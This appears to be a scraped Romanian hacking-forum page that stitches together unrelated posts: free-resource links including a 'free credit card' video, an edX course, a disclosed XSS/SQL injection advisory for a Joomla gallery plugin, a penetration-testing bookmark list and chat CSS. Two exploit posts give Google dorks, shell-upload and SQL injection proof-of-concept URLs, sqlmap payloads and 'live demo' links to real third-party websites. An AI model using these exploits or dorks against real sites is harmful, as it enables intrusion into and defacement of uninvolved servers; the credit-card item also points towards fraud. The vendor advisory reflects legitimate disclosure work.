Leaderboard

Download : http://capr.ga/11n

Salut, Am cunoscut un roman al nostru pe un forum cu care am stat de vorba mai mult pe parte de online money making. In fine aveam nevoie de cateva resurse, omul are cateva videouri...4-5 cred....pe un canal de youtube care cred ca or sa ajute destul de multi pe aici, in special pe cei noi care au nevoie de resurse gratuite. PS: Daca un admin considera spam, va rog stergeti. Multumesc. Free VPS (Amazon & Google) Full Tutorial : Free .Edu email adress : Free credit card (Am folosit si eu pentru unele servicii care cereau neaparat si carte de credit la inregistrare , gen amazon ) : PS: Nu detin canalul, daca apare ceva neinregula imi spuneti si o sa sterg /editez. Sper sa ajute, stiu ca si eu aveam nevoie de astfel de lucruri la un moment dat. Numai Bine.

Go to Youtube and Type Doge meme in Search Box.See the magic. ~Font Colour will be changed~ Go to Youtube and Type Use the Force Luke in Search Box.See the magic. ~Animated Youtube~ Go to Youtube and Type Do the Harlem Shake in Search Box.See the magic. Youtube Will Dance

Starts on August 30, 2016 - Te poti inscrie aici: https://www.edx.org/course/introduction-computer-science-mitx-6-00-1x-8#! Length: 9 weeks Effort: 15 hours per week Price: Free Institution: MITx Subject: Computer Science Level: Introductory Languages: English Video Transcripts: English Prerequisites High school algebra and a reasonable aptitude for mathematics. Students without prior programming background will find there is a steep learning curve and may have to put in more than the estimated time effort. What you'll learn A Notion of computation The Python programming language Some simple algorithms Testing and debugging An informal introduction to algorithmic complexity Data structures Since these courses may be the only formal computer science courses many of the students take, we have chosen to focus on breadth rather than depth. The goal is to provide students with a brief introduction to many topics so they will have an idea of what is possible when they need to think about how to use computation to accomplish some goal later in their career. That said, they are not "computation appreciation" courses. They are challenging and rigorous courses in which the students spend a lot of time and effort learning to bend the computer to their will.

Salut, Sper sa ajute, e un trial de 14 zile, nu trebuie card la inregistrare. https://saucelabs.com/signup/trial M-am gandit ca e ok ca mediu de testare intrucat vine cu mai multe OS-uri Preview : Spor !

Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla Fixed: v1.1.7 Author: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva Date: 2016-07-14 Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro Vendor: huge-it.com Vendor Notified: 2016-07-15, fixed 2016-07-23 Vendor Contact: info@huge-it.com Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links. Vulnerability: The attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability: SQL in code via id parameter: ./administrator/components/com_gallery/models/gallery.php 51 public function getPropertie() { 52 $db = JFactory::getDBO(); 53 $id_cat = JRequest::getVar('id'); 54 $query = $db->getQuery(true); 55 $query->select('#__huge_itgallery_images.name as name,' 56 . '#__huge_itgallery_images.id ,' 57 . '#__huge_itgallery_gallerys.name as portName,' 58 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itg allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width'); 59 $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg allery_images')); 60 $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat); 61 $query->order('ordering desc'); 62 64 $db->setQuery($query); 65 $results = $db->loadObjectList(); 66 return $results; 67 } XSS is here: root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \; ./administrator/components/com_gallery/views/gallery/tmpl/default.php root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \; 256: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" > CVE Assignments:A CVE-2016-1000113 XSS,A CVE-2016-1000114 SQL Injection JSON: Export Exploit Code: XSS PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E SQLi PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE $ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql Screen Shots: Advisory:A http://www.vapidlabs.com/advisory.php?v=164 via

Blogs, Feeds, Guides & Links I was cleaning out my bookmarks, de-cluttering twitter favourites and closing a few tabs. Re-saw a few 'hidden gems' as well as repeating finding links for people, so I thought I would try and 'dump' them all in one place. These are roughly sorted, if you're wanting something better - I highly recommend having a look at the pentest-bookmarks. Programming/Coding [bash] Advanced Bash-Scripting Guide - http://tldp.org/LDP/abs/html/ [bash] Bash shell scripting tutorial - http://steve-parker.org/sh/sh.shtml [bash] Bourne Shell Reference - http://linuxreviews.org/beginner/bash_GNU_Bourne-Again_SHell_Reference/ [CheatSheet] Scripting Languages: PHP, Perl, Python, Ruby - http://hyperpolyglot.org/scripting Offensive Security's Pentesting With BackTrack (PWB) Course [Pre-course] Corelan Team - http://www.corelan.be [Pre-course] The Penetration Testing Execution Standard - http://www.pentest-standard.org/index.php/Main_Page [Hash] NTLM Decrypter - http://www.md5decrypter.co.uk/ntlm-decrypt.aspx [Hash] reverse hash search and calculator - http://goog.li http://security.crudtastic.com/?p=213 Tunnelling / Pivoting [Linux] SSH gymnastics with proxychains - http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html [Windows] Nessus Through SOCKS Through Meterpreter - http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php WarGames / Online Challenges [WarGames] Title - http://securityoverride.com [WarGames] Title - http://intruded.net [Challenge] The Ksplice Pointer Challenge - http://blogs.oracle.com/ksplice/ [WarGames] Title - http://spotthevuln.com [WarGames] Title - http://cvo-lab.blogspot.com/2011/05/iawacs-2011-forensics-challenge.html [WarGames] Title - http://ftp.hackerdom.ru/ctf-images/ Exploit Development (Programs) [Download] Title - http://www.oldapps.com/ [Download] Title - http://www.oldversion.com/ [Download] Title - http://www.exploit-db.com/webapps/ Misc [RSS] Open Penetration Testing Bookmarks Collection - https://code.google.com/p/pentest-bookmarks/downloads/list [ExploitDev] Data mining Backtrack 4 for buffer overflow return addresses - http://insidetrust.blogspot.com/2010/12/data-mining-backtrack-4-for-buffer.html [DIY] Repair a Broken Ethernet Plug - http://www.instructables.com/id/Repair-a-Broken-Ethernet-Plug/step5/Make-its-Head-Thin/ [Desktop] Ubuntu Security - http://ubuntuforums.org/showthread.php?t=510812 [TechHumor] Title - https://www.xkcd.com [TechHumor] Title - http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf Exploit Development [Guides] Corelan Team - http://www.corelan.be [Guide] From 0x90 to 0x4c454554, a journey into exploitation. - http://myne-us.blogspot.com/2010/08/from-0x90-to-0x4c454554-journey-into.html [Guide] An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities - http://resources.infosecinstitute.com/intro-to-fuzzing/ TiGa's Video Tutorial Series on IDA Pro - http://www.woodmann.com/TiGa/idaseries.html [Guide] Advanced Windows Buffer Overflows - http://labs.snort.org/awbo/ [Guide] Stack Based Windows Buffer Overflow Tutorial - http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.htmlt [Guide] SEH Stack Based Windows Buffer Overflow Tutorial - http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html [Guide] Windows Buffer Overflow Tutorial: Dealing with Character Translation - http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html [Guide] Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability< - http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html [Guide] Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump - http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html [Linux] Linux exploit development part 1 – Stack overflow. - http://sickness.tor.hu/?p=363 [Linux] Linux Exploit Writing Tutorial Pt 2 – Stack Overflow ASLR bypass Using ret2reg - http://sickness.tor.hu/?p=365 [Linux] Linux exploit development part 3 – ret2libc - http://sickness.tor.hu/?p=368 [Linux] Linux exploit development part 4 – ASCII armor bypass + return-to-plt - http://sickness.tor.hu/?p=378 [TechHumor] Title - [TechHumor] Title - http://amolnaik4.blogspot.com/2011/06/exploit-development-with-monapy.html Exploit Development (Case Studies/Walkthroughs) [Web] Finding 0days in Web Applications - http://www.exploit-db.com/finding-0days-in-web-applications/ [Windows] Offensive Security Exploit Weekend - http://www.corelan.be/index.php/2010/11/13/offensive-security-exploit-weekend/ [Windows] From vulnerability to exploit under 5 min - http://0entropy.blogspot.com/2011/02/from-vulnerability-to-exploit-under-5.html Exploit Development (Patch Analysis) [Windows] A deeper look at ms11-058 - http://www.skullsecurity.org/blog/2011/a-deeper-look-at-ms11-058 [Windows] Patch Analysis for MS11-058 - https://community.qualys.com/blogs/securitylabs/2011/08/23/patch-analysis-for-ms11-058 [Windows] CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability - http://j00ru.vexillium.org/?p=893 [Mobile] Analyzing and dissecting Android applications for security defects and vulnerabilities - https://www.net-security.org/article.php?id=1613 Exploit Development (Metasploit Wishlist) [ExplotDev] Metasploit Exploits Wishlist ! - http://esploit.blogspot.com/2011/03/metasploit-exploits-wishlist.html [Guide] Porting Exploits To Metasploit Part 1 - http://www.securitytube.net/video/2118 Passwords & Rainbow Tables (WPA) [RSS] Title - http://ob-security.info/?p=475 [RSS] Title - http://nakedsecurity.sophos.com/2011/06/14/the-top-10-passcodes-you-should-never-use-on-your-iphone/ [RSS] Title - http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html [WPA] Offensive Security: WPA Rainbow Tables - http://www.offensive-security.com/wpa-tables/ [Tool] Ultra High Security Password Generator - https://www.grc.com/passwords.htm [Guide] Creating effective dictionaries for password attacks - http://insidetrust.blogspot.com/2010/07/creating-effective-dictionaries-for.html [Leaked] Diccionarios con Passwords de Sitios Expuestos - http://www.dragonjar.org/diccionarios-con-passwords-de-sitios-expuestos.xhtml [Download] Index of / - http://svn.isdpodcast.com/wordlists/ [Guide] Using Wikipedia as brute forcing dictionary - http://lab.lonerunners.net/blog/using-wikipedia-as-brute-forcing-dictionary [Tool] CeWL - Custom Word List generator - http://www.digininja.org/projects/cewl.php [Download] Title - http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists [Leaked] Passwords - http://www.skullsecurity.org/wiki/index.php/Passwords Cheat-Sheets [OS] A Sysadmin's Unixersal Translator - http://bhami.com/rosetta.html [WiFi] WirelessDefence.org's Wireless Penetration Testing Framework - http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html Anti-Virus [Metasploit] Facts and myths about antivirus evasion with Metasploit - http://schierlm.users.sourceforge.net/avevasion.html [Terms] Methods of bypassing Anti-Virus (AV) Detection - NetCat - http://compsec.org/security/index.php/anti-virus/283-anti-virus-central-methods-of-bypassing-anti-virus-av-detection.html Privilege Escalation [Linux] Hacking Linux Part I: Privilege Escalation - http://www.dankalia.com/tutor/01005/0100501004.htm [Windows] Windows 7 UAC whitelist - http://www.pretentiousname.com/misc/win7_uac_whitelist2.html [Windows] Windows Privilege Escalation Part 1: Local Administrator Privileges - http://www.netspi.com/blog/2009/10/05/windows-privilege-escalation-part-1-local-administrator-privileges/ Metasploit [Guide] fxsst.dll persistence: the evil fax machine - http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the-evil-fax-machine.html [Guide] Bypassing DEP/ASLR in browser exploits with McAfee and Symantec - http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/ [Guides] Metasploit Unleashed - http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training [Guides] Metasploit Megaprimer (Exploitation Basics And Need For Metasploit) Part 1 - http://www.securitytube.net/video/1175 Default Generators [WEP] mac2wepkey - Huawei default WEP generator - http://websec.ca/blog/view/mac2wepkey_huawei [WEP] Generator: Attacking SKY default router password - http://sec.jetlib.com/BackTrack_Linux_Forums/2011/01/12/Generator:_Attacking_SKY_default_router_password Statistics [Defacements] Zone-H - http://www.zone-h.org [ExploitKits] CVE Exploit Kit list - http://exploitkit.ex.ohost.de/CVE%20Exploit%20Kit%20List.htm Cross Site Scripting (XSS) [Guide] vbSEO – From XSS to Reverse PHP Shell - http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/ [RSS] Title - http://www.thespanner.co.uk/2009/03/25/xss-rays/ Podcasts [Weekly] PaulDotCom - http://pauldotcom.com/podcast/psw.xml [Monthly] Social-Engineer - http://socialengineer.podbean.com/feed/ Blogs & RSS [RSS] SecManiac - http://www.secmaniac.com [Guides] Carnal0wnage & Attack Research - http://carnal0wnage.attackresearch.com [RSS] Contagio - http://contagiodump.blogspot.com [News] THN : The Hacker News - http://thehackernews.com [News] Packet Storm: Full Disclosure Information Security - http://packetstormsecurity.org [Guides] pentestmonkey | Taking the monkey work out of pentesting - http://pentestmonkey.net [RSS] Darknet - The Darkside | Ethical Hacking, Penetration Testing & Computer Security - http://www.darknet.org.uk [RSS] Irongeek - http://www.irongeek.com [Metasploit] Room 363 - http://www.room362.com [Guides] Question Defense: Technology Answers For Technology Questions - http://www.question-defense.com/ [Guides] stratmofo's blog - http://securityjuggernaut.blogspot.com [Guides] TheInterW3bs - http://theinterw3bs.com [Guides] consolecowboys - http://console-cowboys.blogspot.com [Guides] A day with Tape - http://adaywithtape.blogspot.com [Guides] Cybexin's Blog - Network Security Blog - http://cybexin.blogspot.com [RSS] BackTrack Linux - Penetration Testing Distribution - http://www.backtrack-linux.org/feed/ [RSS] Offensive Security - http://www.offensive-security.com/blog/feed/ [RSS] Title - http://www.pentestit.com [RSS] Title - http://michael-coates.blogspot.com [RSS] Title - http://blog.0x0e.org [RSS] Title - http://0x80.org/blog [RSS] Title - http://archangelamael.shell.tor.hu [RSS] Title - http://archangelamael.blogspot.com [RSS] Title - http://www.coresec.org [RSS] Title - http://noobys-journey.blogspot.com [RSS] Title - http://www.get-root.com [RSS] Title - http://www.kislaybhardwaj.com [RSS] Title - https://community.rapid7.com/community/metasploit/blog [RSS] Title - http://mimetus.blogspot.com [RSS] Title - http://hashcrack.blogspot.com [RSS] Title - https://rephraseit.wordpress.com [RSS] Title - http://www.exploit-db.com [RSS] Title - http://skidspot.blogspot.com [RSS] Title - http://grey-corner.blogspot.com [RSS] Title - http://vishnuvalentino.com [RSS] Title - http://ob-security.info Sursa: http://g0tmi1k.blogspot.com/2011/11/blog-guides-links.html

################################################################ # Exploit Title : Joomla com_weblinks Shell Upload Vulnerability # Exploit Author : howucan # Website : http://howucan.gr # Dork : allinurl:/index.php?option e_name jform_description asset=com_weblinks # Software link : http://extensions.joomla.org/extensions/extension/official-extensions/weblinks # Tested on: [ Kali Linux 2 ] # Date: 2016/07/24 # video Proof : https://www.youtube.com/watch?v=rHM8XJUhBzQ # ###################### # [+] PoC : ###################### # 1 Select A Website From The Dork Above # 2 http://localhost/site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # 3 Just Upload your Shell or Txt or Image to Upload Field # 4 Shell Directory : http://localhost/site/images/shell.txt # Ex http://www.verenikelife2009.gr/images/a.txt ###################### # [+] Live Demo: # http://www.orrca.org.au/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # http://egyptfuntours.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # http://englishshotokan.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= ################################################################# via

I l-am trimis eu PM. Ma gandesc ca nu vroia sa fie indexat link-ul direct cel care l-a postat.

E de la ei....ca e un redirect cattre google drive...o sa revina @Webz

###################### # Exploit Title : Joomla com_showdown SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_showdown # version : 1.5.0 # Tested on: [ Windows 7 ] # skype:xbadgirl21 # Date: 2016/07/24 # video Proof : https://youtu.be/IglNYsDcV3g ###################### # [+] DESCRIPTION : ###################### # [+] an SQL injection been Detected in this Joomla components showdown after you add ['] or ["] to # [+] Vuln Target Parameter you will get error like : # [+] You have an error in your SQL syntax; check the manual that corresponds to your MySQL or # [+] You Will Notice a change in the Frontpage of the target . ###################### # [+] Poc : ###################### # [typeid] Get Parameter Vulnerable To SQLi # http://127.0.0.1/index.php?option=com_showdown&typeid=999999 [INJECT HERE] ###################### # [+] SQLmap PoC: ###################### # GET parameter 'typeid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] # # Parameter: typeid (GET) # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: option=com_showdown&typeid=11 AND SLEEP(5) # # Type: UNION query # Title: Generic UNION query (NULL) - 6 columns # Payload: option=com_showdown&typeid=11 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x4d7254764c576b495a504e73726d636f6a65695971624f6f64424e6870 # 43554447614a527451564c,0x71706a7171),NULL-- LZga # --- # [12:59:46] [INFO] the back-end DBMS is MySQL # web server operating system: Linux Debian 6.0 (squeeze) # web application technology: PHP 5.2.6, Apache 2.2.16 # back-end DBMS: MySQL >= 5.0.12 # [12:59:46] [INFO] fetching database names # available databases [3]: ###################### # [+] Live Demo : ###################### # http://www.circuse.eu/index.php?option=com_showdown&typeid=11 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ###################### CommentsRSS Feed via

Salut . La fel si eu sunt tot din Bistrița

Singurul lucru pe care poti sa il faci e sa il setezi pe un canal wifi liber sau sa ii cumperi o antena mai potenta sau sa iti iei un wifi extender. LE: Vezi aici ce iti place, numai sa aibe conector rp-sma

@fallen_angel @urs

ok!

The Scottish Pokemon https://www.facebook.com/lee.gilmour.12/videos/869768619822883/

Ceva pentru a face chat-ul mai frumi. #elChatTabsContent > .ipsTabs_panel { height: 100%; } #elUserList { max-height: calc(100vh - 155px); } #ipsLayout_contentWrapper { padding-bottom: 10px; padding-left: 10px; padding-right: 10px; } #ipsLayout_mainArea { padding: 0; } .cChatCompose { bottom: auto; } .ipsLayout_container { max-width: 100%; } body { height: 100%; line-height: 1; } div.flexColumns.mobileLayout { display: none; } div.ipsColumn.ipsColumn_wide { height: calc(100vh - 130px); } div.ipsfocus_breadcrumbWrap.ipsClearfix { display: none; } footer.ipsClearfix { display: none; } h2.ipsType_sectionTitle { display: none; } nav.ipsBreadcrumb.ipsBreadcrumb_bottom.ipsFaded_withHover { display: none; } nav.ipsBreadcrumb.ipsBreadcrumb_bottom.ipsFaded_withHover ul { display: none; } nav.ipsBreadcrumb.ipsBreadcrumb_top.ipsFaded_withHover ul { display: none; } ul.ipsList_reset.cChatContainer { height: calc(100vh - 202px); } vs